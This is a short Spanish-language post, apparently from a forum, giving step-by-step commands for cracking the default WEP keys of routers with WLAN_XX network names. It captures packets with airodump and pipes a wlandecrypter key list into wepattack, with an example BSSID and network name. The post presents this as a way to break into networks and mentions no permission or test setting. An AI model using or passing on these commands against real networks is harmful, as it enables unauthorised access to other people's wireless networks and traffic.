Yo lo hago de la siguiente manera:
Necesitas el programa WepAttack para pasarle la lista generada por WlanDecrypter y el se encargara de buscar la clave (en unos 15 segundos o menos la tendremos lista).
Para empezar a descifrar redes capturas paquetes con el programa airodump que se encuentra en la suite aircrack.
Con el comando:
# airodump nombre_interfaz nombre_archivo canal
Una vez que tengamos algun paquete de la red en cuestion, salimos de airodump.
Ejecutamos wlandecrypter de la siguiente manera:
# wlandecrypter bssid essid | wepattack -f nombre_archivo.cap
En el ejemplo anterior para una red llamada WLAN_b5
# wlandecrypter 00:03:C9:XX:XX:XX WLAN_b5 | wepattack -f captura-01.cap
Al momento si la contraseña está por defecto wepattack te la dirá.
Si no sale, lo mas probable es que la contraseña haya sido cambiada y no te quede más remedio que hacerlo a lo tradicional.
